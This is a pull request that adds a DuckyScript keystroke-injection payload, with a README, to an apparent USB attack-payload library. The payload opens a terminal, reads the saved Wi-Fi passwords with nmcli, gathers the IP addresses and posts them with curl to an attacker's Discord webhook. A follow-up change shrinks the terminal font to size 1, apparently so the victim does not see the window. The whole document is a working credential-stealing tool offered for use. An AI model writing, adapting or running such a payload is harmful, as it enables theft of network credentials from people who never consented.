### PR TITLE
New payload exfiltrate linux wifi credentials

### DIFF
--- a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md
@@ -1,0 +1,35 @@
+# Exfiltrate wifi creds of a linux system to a discord webhook
+
+This payload grabs the wifi credentials on a linux system and sens it to you with a discord webhook.
+
+## Getting started
+
+### Dependencies
+- Linux
+- Bash
+- Network Manager
+
+### Prerequisites
+
+If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`:
+```
+REM_BLOCK
+Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 200
+STRINGLN xterm
+DELAY 500
+END_REM
+```
+
+If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line:
+```
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+```
+
+## Settings
+- #dc your discord webhook

--- a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
@@ -1,0 +1,42 @@
+REM_BLOCK
+###############################################
+#                                             |
+# Title        : Get Linux wifi credentials   |
+# Author       : simen64                      |
+# Version      : 1.0                          |
+# Category     : Exfiltration                 |
+# Target       : Linux                        |
+#                                             |
+###############################################
+END_REM
+
+REM change to your keyboard layout
+DUCKY_LANG NO
+
+REM put your discord webhook here
+DEFINE #dc webhook here
+
+DELAY 2000
+CAPSLOCK_DISABLE
+DEFAULT_DELAY 10
+
+REM_BLOCK
+Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
+ALT F2
+DELAY 200
+STRINGLN xterm
+DELAY 500
+END_REM
+
+REM_BLOCK
+Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line)
+CTRL-ALT t
+DELAY 500
+END_REM
+
+STRING output=$(nmcli dev wifi show-password && nmcli | grep "inet4\|inet6" | grep -v "127.0.0.1\|::1" | sed 's/
+CTRL v
+TAB
+STRINGLN //')
+STRINGLN escaped_output=$(printf '%s' "$output" | jq -sRr @json)
+STRINGLN curl -H "Content-Type: application/json" -d "{\"username\": \"Wifi grabber\", \"content\": $escaped_output}" "#dc" && exit

--- a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
+++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt
@@ -24,7 +24,7 @@ REM_BLOCK
 Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line)
 ALT F2
 DELAY 200
-STRINGLN xterm
+STRINGLN xterm -fa monaco -fs 1
 DELAY 500
 END_REM
 


### PR DESCRIPTION
Adds a new simple payload that uses network manager to get the current wifi credentials and sends them to you over discord.